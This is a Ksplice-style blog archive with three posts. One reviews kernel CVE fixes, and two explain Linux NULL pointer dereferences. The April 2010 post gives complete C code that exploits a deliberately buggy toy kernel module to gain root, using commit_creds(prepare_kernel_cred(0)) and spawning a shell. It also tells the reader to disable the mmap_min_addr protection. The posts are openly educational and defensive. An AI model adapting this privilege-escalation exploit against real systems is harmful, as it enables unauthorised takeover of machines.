Wednesday Jul 22, 2015

Fixing Security Vulnerabilities in Linux

Security vulnerabilities are some of the hardest bugs to discover yet they can have the largest impact. At Ksplice, we spend a lot of time looking at security vulnerabilities and seeing how they are fixed. We use automated tools such as the Trinity syscall fuzzer and the Kernel Address Sanitizer (KASan) to aid our process. In this blog post we'll go over some case studies of recent vulnerabilities and show you how you can avoid them in your code.

CVE-2013-7339 and CVE-2014-2678

These two are very similar NULL pointer dereferences when trying to bind an RDS socket without having an RDS device. This is an oversight that happens quite often in hardware-specific code in the kernel. It is easy for developers to assume that a piece of hardware always exists since all their dev machines have it, but that sometimes leads to other possible hardware configurations left untested. In this example the code makes a seemingly reasonable assumption that using RDS sockets without RDS hardware doesn't really make sense.

The issue is pretty simple as we can see from this fix:

diff --git a/net/rds/ib.c b/net/rds/ib.c
index b4c8b00..ba2dffe 100644
--- a/net/rds/ib.c
+++ b/net/rds/ib.c
@@ -338,7 +338,8 @@ static int rds_ib_laddr_check(__be32 addr)
   ret = rdma_bind_addr(cm_id, (struct sockaddr *)&sin);
   /* due to this, we will claim to support iWARP devices unless we
      check node_type. */
-     if (ret || cm_id->device->node_type != RDMA_NODE_IB_CA)
+     if (ret || !cm_id->device ||
+         cm_id->device->node_type != RDMA_NODE_IB_CA)
                                   ret = -EADDRNOTAVAIL;

                                   rdsdebug("addr %pI4 ret %d node type %d\n",

Generally we are allowed to bind an address without a physical device so we can reach this code without any RDS hardware. Sadly, this code wrongly assumes that a devices exists at this point and that cm_id->device is not NULL leading to a NULL pointer dereference.

These type of issues are usually caught early in -next as that exposes the code to various users and hardware configurations, but this one managed to slip through somehow.

There are many variations of the scenario where the hardware specific and other kernel code doesn't handle cases which "don't make sense". Another recent example is dlmfs. The kernel would panic when trying to create a directory on it - something that doesn't happen in regular usage of dlmfs.

CVE-2014-3940

This one is interesting and very difficult to stumble upon by accident. It's a race condition that is only possible during the migration of huge pages between NUMA nodes, so the window of opportunity is *very* small. It can be triggered by trying to dump the NUMA maps of a process while its memory is being moved around. What happens is that the code trying to dump memory makes invalid memory accesses because it does not check the presence of the memory beforehand.

When we dump NUMA maps we need to walk memory entries using walk_page_range():


        /*
         * Handle hugetlb vma individually because pagetable
         * walk for the hugetlb page is dependent on the
         * architecture and we can't handled it in the same
         * manner as non-huge pages.
         */
        if (walk->hugetlb_entry && (vma->vm_start <= addr) &&
            is_vm_hugetlb_page(vma)) {
                if (vma->vm_end < next)
                        next = vma->vm_end;
                /*
                 * Hugepage is very tightly coupled with vma,
                 * so walk through hugetlb entries within a
                 * given vma.
                 */
                err = walk_hugetlb_range(vma, addr, next, walk);
                if (err)
                        break;
                pgd = pgd_offset(walk->mm, next);
                continue;
        }

When walk_page_range() detects a hugepage it calls walk_hugetlb_range(), which calls the proc's callback (provided by walk->hugetlb_entry()) for each page individually:


        pte_t *pte;
        int err = 0;

        do {
                next = hugetlb_entry_end(h, addr, end);
                pte = huge_pte_offset(walk->mm, addr & hmask);
                if (pte && walk->hugetlb_entry)
                        err = walk->hugetlb_entry(pte, hmask, addr, next, walk);
                if (err)
                        return err;
        } while (addr = next, addr != end);

Note that the callback is executed for each pte; even for those that are not present in memory (pte_present(*pte) would return false in that case). This is done by the walker code because it was assumed that callback functions might want to handle that scenario for some reason. In the past there was no way for a huge pte to be absent, but that changed when the hugepage migration was introduced. During page migration unmap_and_move_huge_page() removes huge ptes:

if (page_mapped(hpage)) {

try_to_unmap(hpage, TTU_MIGRATION|TTU_IGNORE_MLOCK|TTU_IGNORE_ACCESS);

page_was_mapped = 1;

}

Unfortunately, some callbacks were not changed to deal with this new possibility. A notable example is gather_pte_stats(), which tries to lock a non-existent pte:


        orig_pte = pte = pte_offset_map_lock(vma->vm_mm, pmd, addr, &ptl);

This can cause a panic if it happens during a tiny window inside unmap_and_move_huge_page().

Dumping NUMA maps doesn't happen too often and is mainly used for testing/debugging, so this bug has lived there for quite a while and was made visible only recently when hugepage migration was added.

It's also common that adding userspace interfaces to trigger kernel code which doesn't get called often exposes many issues. This happened recently when the firmware loading code was exposed to userspace.

CVE-2014-4171

This one also falls into the category of "doesn't make sense" because it involves repeated page faulting of memory that we marked as unwanted. When this happens shmem tries to remove a block of memory, but since it's getting faulted over and over again shmem will hang waiting until it's available for removal. Meanwhile other filesystem operations will be blocked, which is bad because that memory may never become available for removal.

When we're faulting a shmem page in, shmem_fault() would grab a reference to the page:

static int shmem_fault(struct vm_area_struct *vma, struct vm_fault *vmf) { [...] error = shmem_getpage(inode, vmf->pgoff, &vmf->page, SGP_CACHE, &ret);

But because shmem_fallocate() holds i_mutex this means that shmem_fallocate() can wait forever until it can free up that page. This, in turn means that that filesystem is stuck waiting for shmem_fallocate() to complete.

Beyond that, punching holes in files and marking memory as unwanted are not common operations; especially not on a shmem filesystem. This means that those code paths are very untested.

CVE-2014-4943

This is a privilege escalation which was found using KASan. We've noticed that as a result of a call to a PPPOL2TP ioctl an uninitialized address inside a struct was being read. Further investigation showed that this is the result of a confusion about the type of the struct that was being accessed.

When we call setsockopt from userspace on a PPPOL2TP socket in userspace we'll end up in pppol2tp_setsockopt() which will look at the level parameter to see if the sockopt operation is intended for PPPOL2TP or the underlying UDP socket:


   if (level != SOL_PPPOL2TP)
      return udp_prot.setsockopt(sk, level, optname, optval, optlen);

PPPOL2TP tries to be helpful here and allows userspace to set UDP sockopts rather than just PPPOL2TP ones. The problem here is that UDP's setsockopt expects a udp_sock:


 int udp_lib_setsockopt(struct sock *sk, int level, int optname,
                        char __user *optval, unsigned int optlen,
                        int (*push_pending_frames)(struct sock *))
 {
         struct udp_sock *up = udp_sk(sk);

But instead it's getting just a sock struct.

It's possible to leverage this struct confusion to achieve privilege escalation. We can overwrite the function pointer in the struct to point to code of our choice. Then we can trigger the execution of this code by making another socket operation. The piece of code that allowed for this vulnerability was added for convenience, but no one ever needed it, and it was never tested.

Conclusion

We hope that this exposition of straightforward and more subtle kernel bugs will remind of the importance of looking at code from a new perspective and encourage the developer community to contribute to and create new tools and methodologies for detecting and preventing bugs in the kernel.

Monday Apr 12, 2010

Much ado about NULL: Exploiting a kernel NULL dereference

Last time, we took a brief look at virtual memory and what a NULL pointer really means, as well as how we can use the mmap(2) function to map the NULL page so that we can safely use a NULL pointer. We think that it's important for developers and system administrators to be more knowledgeable about the attacks that black hats regularly use to take control of systems, and so, today, we're going to start from where we left off and go all the way to a working exploit for a NULL pointer dereference in a toy kernel module.

A quick note: For the sake of simplicity, concreteness, and conciseness, this post, as well as the previous one, assumes Intel x86 hardware throughout. Most of the discussion should be applicable elsewhere, but I don't promise any of the details are the same.

nullderef.ko

In order to allow you play along at home, I've prepared a trivial kernel module that will deliberately cause a NULL pointer derefence, so that you don't have to find a new exploit or run a known buggy kernel to get a NULL dereference to play with. I'd encourage you to download the source and follow along at home. If you're not familiar with building kernel modules, there are simple directions in the README. The module should work on just about any Linux kernel since 2.6.11.

Don't run this on a machine you care about – it's deliberately buggy code, and will easily crash or destabilize the entire machine. If you want to follow along, I recommend spinning up a virtual machine for testing.

While we'll be using this test module for demonstration, a real exploit would instead be based on a NULL pointer dereference somewhere in the core kernel (such as last year's sock_sendpage vulnerability), which would allow an attacker to trigger a NULL pointer dereference -- much like the one this toy module triggers -- without having to load a module of their own or be root.

If we build and load the nullderef module, and execute

echo 1 > /sys/kernel/debug/nullderef/null_read

our shell will crash, and we'll see something like the following on the console (on a physical console, out a serial port, or in dmesg):

BUG: unable to handle kernel NULL pointer dereference at 00000000

IP: [<c5821001>] null_read_write+0x1/0x10 [nullderef]

The kernel address space

e We saw last time that we can map the NULL page in our own application. How does this help us with kernel NULL dereferences? Surely, if every application has its own address space and set of addresses, the core operating system itself must also have its own address space, where it and all of its code and data live, and mere user programs can't mess with it?

For various reasons, that that's not quite how it works. It turns out that switching between address spaces is relatively expensive, and so to save on switching address spaces, the kernel is actually mapped into every process's address space, and the kernel just runs in the address space of whichever process was last executing.

In order to prevent any random program from scribbling all over the kernel, the operating system makes use of a feature of the x86's virtual memory architecture called memory protection. At any moment, the processor knows whether it is executing code in user (unprivileged) mode or in kernel mode. In addition, every page in the virtual memory layout has a flag on it that specifies whether or not user code is allowed to access it. The OS can thus arrange things so that program code only ever runs in "user" mode, and configures virtual memory so that only code executing in "kernel" mode is allowed to read or write certain addresses. For instance, on most 32-bit Linux machines, in any process, the address 0xc0100000 refers to the start of the kernel's memory – but normal user code is not allowed to read or write it.

A diagram of virtual memory and memory protection
A diagram of virtual memory and memory protection

Since we have to prevent user code from arbitrarily changing privilege levels, how do we get into kernel mode? The answer is that there are a set of entry points in the kernel that expect to be callable from unprivileged code. The kernel registers these with the hardware, and the hardware has instructions that both switch to one of these entry points, and change to kernel mode. For our purposes, the most relevant entry point is the system call handler. System calls are how programs ask the kernel to do things for them. For example, if a programs want to write from a file, it prepares a file descriptor referring to the file and a buffer containing the data to write. It places them in a specified location (usually in certain registers), along with the number referring to the write(2) system call, and then it triggers one of those entry points. The system call handler in the kernel then decodes the argument, does the write, and return to the calling program.

This all has at least two important consequence for exploiting NULL pointer dereferences:

First, since the kernel runs in the address space of a userspace process, we can map a page at NULL and control what data a NULL pointer dereference in the kernel sees, just like we could for our own process!

Secondly, if we do somehow manage to get code executing in kernel mode, we don't need to do any trickery at all to get at the kernel's data structures. They're all there in our address space, protected only by the fact that we're not normally able to run code in kernel mode.

We can demonstrate the first fact with the following program, which writes to the null_read file to force a kernel NULL dereference, but with the NULL page mapped, so that nothing goes wrong:

(As in part I, you'll need to echo 0 > /proc/sys/vm/mmap_min_addr as root before trying this on any recent distribution's kernel. While mmap_min_addr does provide some protection against these exploits, attackers have in the past found numerous ways around this restriction. In a real exploit, an attacker would use one of those or find a new one, but for demonstration purposes it's easier to just turn it off as root.)

#include <sys/mman.h>
#include <stdio.h>
#include <fcntl.h>

int main() {
  mmap(0, 4096, PROT_READ|PROT_WRITE,
       MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  int fd = open("/sys/kernel/debug/nullderef/null_read", O_WRONLY);
  write(fd, "1", 1);
  close(fd);

  printf("Triggered a kernel NULL pointer dereference!\n");
  return 0;
}

Writing to that file will trigger a NULL pointer dereference by the nullderef kernel module, but because it runs in the same address space as the user process, the read proceeds fine and nothing goes wrong – no kernel oops. We've passed the first step to a working exploit.

Putting it together

To put it all together, we'll use the other file that nullderef exports, null_call. Writing to that file causes the module to read a function pointer from address 0, and then call through it. Since the Linux kernel uses function pointers essentially everywhere throughout its source, it's quite common that a NULL pointer dereference is, or can be easily turned into, a NULL function pointer dereference, so this is not totally unrealistic.

So, if we just drop a function pointer of our own at address 0, the kernel will call that function pointer in kernel mode, and suddenly we're executing our code in kernel mode, and we can do whatever we want to kernel memory.

We could do anything we want with this access, but for now, we'll stick to just getting root privileges. In order to do so, we'll make use of two built-in kernel functions, prepare_kernel_cred and commit_creds. (We'll get their addresses out of the /proc/kallsyms file, which, as its name suggests, lists all kernel symbols with their addresses)

struct cred is the basic unit of "credentials" that the kernel uses to keep track of what permissions a process has – what user it's running as, what groups it's in, any extra credentials it's been granted, and so on. prepare_kernel_cred will allocate and return a new struct cred with full privileges, intended for use by in-kernel daemons. commit_cred will then take the provided struct cred, and apply it to the current process, thereby giving us full permissions.

Putting it together, we get:

#include <sys/mman.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

struct cred;
struct task_struct;

typedef struct cred *(*prepare_kernel_cred_t)(struct task_struct *daemon)
  __attribute__((regparm(3)));
typedef int (*commit_creds_t)(struct cred *new)
  __attribute__((regparm(3)));

prepare_kernel_cred_t prepare_kernel_cred;
commit_creds_t commit_creds;

/* Find a kernel symbol in /proc/kallsyms */
void *get_ksym(char *name) {
    FILE *f = fopen("/proc/kallsyms", "rb");
    char c, sym[512];
    void *addr;
    int ret;

    while(fscanf(f, "%p %c %s\n", &addr, &c, sym) > 0)
        if (!strcmp(sym, name))
            return addr;
    return NULL;
}

/* This function will be executed in kernel mode. */
void get_root(void) {
        commit_creds(prepare_kernel_cred(0));
}

int main() {
  prepare_kernel_cred = get_ksym("prepare_kernel_cred");
  commit_creds        = get_ksym("commit_creds");

  if (!(prepare_kernel_cred && commit_creds)) {
      fprintf(stderr, "Kernel symbols not found. "
                      "Is your kernel older than 2.6.29?\n");
  }

  /* Put a pointer to our function at NULL */
  mmap(0, 4096, PROT_READ|PROT_WRITE,
       MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  void (**fn)(void) = NULL;
  *fn = get_root;

  /* Trigger the kernel */
  int fd = open("/sys/kernel/debug/nullderef/null_call", O_WRONLY);
  write(fd, "1", 1);
  close(fd);

  if (getuid() == 0) {
      char *argv[] = {"/bin/sh", NULL};
      execve("/bin/sh", argv, NULL);
  }

  fprintf(stderr, "Something went wrong?\n");
  return 1;
}

(struct cred is new as of kernel 2.6.29, so for older kernels, you'll need to use this this version, which uses an old trick based on pattern-matching to find the location of the current process's user id. Drop me an email or ask in a comment if you're curious about the details.)

So, that's really all there is. A "production-strength" exploit might add lots of bells and whistles, but, there'd be nothing fundamentally different. mmap_min_addr offers some protection, but crackers and security researchers have found ways around it many times before. It's possible the kernel developers have fixed it for good this time, but I wouldn't bet on it.

~nelhage

One last note: Nothing in this post is a new technique or news to exploit authors. Every technique described here has been in active use for years. This post is intended to educate developers and system administrators about the attacks that are in regular use in the wild.

Monday Mar 29, 2010

Much ado about NULL: An introduction to virtual memory

Here at Ksplice, we're always keeping a very close eye on vulnerabilities that are being announced in Linux. And in the last half of last year, it was very clear that NULL pointer dereference vulnerabilities were the current big thing. Brad Spengler made it abundantly clear to anyone who was paying the least bit attention that these vulnerabilities, far more than being mere denial of service attacks, were trivially exploitable privilege escalation vulnerabilities. Some observers even dubbed 2009 the year of the kernel NULL pointer dereference.

If you've ever programmed in C, you've probably run into a NULL pointer dereference at some point. But almost certainly, all it did was crash your program with the dreaded "Segmentation Fault". Annoying, and often painful to debug, but nothing more than a crash. So how is it that this simple programming error becomes so dangerous when it happens in the kernel? Inspired by all the fuss, this post will explore a little bit of how memory works behind the scenes on your computer. By the end of today's installment, we'll understand how to write a C program that reads and writes to a NULL pointer without crashing. In a future post, I'll take it a step further and go all the way to showing how an attacker would exploit a NULL pointer dereference in the kernel to take control of a machine!

What's in a pointer?

There's nothing fundamentally magical about pointers in C (or assembly, if that's your thing). A pointer is just an integer, that (with the help of the hardware) refers to a location somewhere in that big array of bits we call a computer's memory. We can write a C program to print out a random pointer:

#include <stdio.h>
int main(int argc, char **argv) {
  printf("The argv pointer = %d\n", argv);
  return 0;
}

Which, if you run it on my machine, prints:

The argv pointer = 1680681096

(Pointers are conventionally written in hexadecimal, which would make that 0x642d2888, but that's just a notational thing. They're still just integers.)

NULL is only slightly special as a pointer value: if we look in stddef.h, we can see that it's just defined to be the pointer with value 0. The only thing really special about NULL is that, by convention, the operating system sets things up so that NULL is an invalid pointer, and any attempts to read or write through it lead to an error, which we call a segmentation fault. However, this is just convention; to the hardware, NULL is just another possible pointer value.

But what do those integers actually mean? We need to understand a little bit more about how memory works in a modern computer. In the old days (and still on many embedded devices), a pointer value was literally an index into all of the memory on those little RAM chips in your computer:

Diagram of Physical Memory Addresses
Mapping pointers directly to hardware memory

This was true for every program, including the operating system itself. You can probably guess what goes wrong here: suppose that Microsoft Word is storing your document at address 700 in memory. Now, you're browsing the web, and a bug in Internet Explorer causes it to start scribbling over random memory and it happens to scribble over memory around address 700. Suddenly, bam, Internet Explorer takes Word down with it. It's actually even worse than that: a bug in IE can even take down the entire operating system.

This was widely regarded as a bad move, and so all modern hardware supports, and operating systems use, a scheme called virtual memory. What this means it that every program running on your computer has its own namespace for pointers (from 0 to 232-1, on a 32-bit machine). The value 700 means something completely different to Microsoft Word and Internet Explorer, and neither can access the other's memory. The operating system is in charge of managing these so-called address spaces, and mapping different pieces of each program's address space to different pieces of physical memory.

A diagram of virtual memory

The world with Virtual Memory. Dark gray shows portions of the address space that refer to valid memory.

mmap(2)

One feature of this setup is that while each process has its own 232 possible addresses, not all of them need to be valid (correspond to real memory). In particular, by default, the NULL or 0 pointer does not correspond to valid memory, which is why accessing it leads to a crash.

Because each application has its own address space, however, it is free to do with it as it wants. For instance, you're welcome to declare that NULL should be a valid address in your application. We refer to this as "mapping" the NULL page, because you're declaring that that area of memory should map to some piece of physical memory.

On Linux (and other UNIX) systems, the function call used for mapping regions of memory is mmap(2). mmap is defined as:

void *mmap(void *addr, size_t length, int prot, int flags,
           int fd, off_t offset);

Let's go through those arguments in order (All of this information comes from the man page):

addr
This is the address where the application wants to map memory. If MAP_FIXED is not specified in flags, mmap may select a different address if the selected one is not available or inappropriate for some reason.
length
The length of the region the application wants to map. Memory can only be mapped in increments of a "page", which is 4k (4096 bytes) on x86 processors.
prot
Short for "protection", this argument must be a combination of one or more of the values PROT_READ, PROT_WRITE, PROT_EXEC, or PROT_NONE, indicating whether the application should be able to read, write, execute, or none of the above, the mapped memory.
flags
Controls various options about the mapping. There are a number of flags that can go here. Some interesting ones are MAP_PRIVATE, which indicates the mapping should not be shared with any other process, MAP_ANONYMOUS, which indicates that the fd argument is irrelevant, and MAP_FIXED, which indicates that we want memory located exactly at addr.
fd
The primary use of mmap is not just as a memory allocator, but in order to map files on disk to appear in a process's address space, in which case fd refers to an open file descriptor to map. Since we just want a random chunk of memory, we're going pass MAP_ANONYMOUS in flags, which indicates that we don't want to map a file, and fd is irrelevant.
offset
This argument would be used with fd to indicate which portion of a file we wanted to map.
mmap returns the address of the new mapping, or MAP_FAILED if something went wrong.

If we just want to be able to read and write the NULL pointer, we'll want to set addr to 0 and length to 4096, in order to map the first page of memory. We'll need PROT_READ and PROT_WRITE to be able to read and write, and all three of the flags I mentioned. fd and offset are irrelevant; we'll set them to -1 and 0 respectively.

Putting it all together, we get the following short C program, which successfully reads and writes through a NULL pointer without crashing!

(Note that most modern systems actually specifically disallow mapping the NULL page, out of security concerns. To run the following example on a recent Linux machine at home, you'll need to run # echo 0 > /proc/sys/vm/mmap_min_addr as root, first.)

#include <sys/mman.h>
#include <stdio.h>

int main() {
  int *ptr = NULL;
  if (mmap(0, 4096, PROT_READ|PROT_WRITE,
           MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0)
      == MAP_FAILED) {
    perror("Unable to mmap(NULL)");
    fprintf(stderr, "Is /proc/sys/vm/mmap_min_addr non-zero?\n");
    return 1;
  }
  printf("Dereferencing my NULL pointer yields: %d\n", *ptr);
  *ptr = 17;
  printf("Now it's: %d\n", *ptr);
  return 0;
}

Next time, we'll look at how a process can not only map NULL in its own address space, but can also create mappings in the kernel's address space. And, I'll show you how this lets an attacker use a NULL dereference in the kernel to take over the entire machine. Stay tuned!

~nelhage

About

Tired of rebooting to update systems? So are we -- which is why we invented Ksplice, technology that lets you update the Linux kernel without rebooting. It's currently available as part of Oracle Linux Premier Support, Fedora, and Ubuntu desktop. This blog is our place to ramble about technical topics that we (and hopefully you) think are interesting.

Search

Archives
« August 2015
SunMonTueWedThuFriSat
      
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
     
Today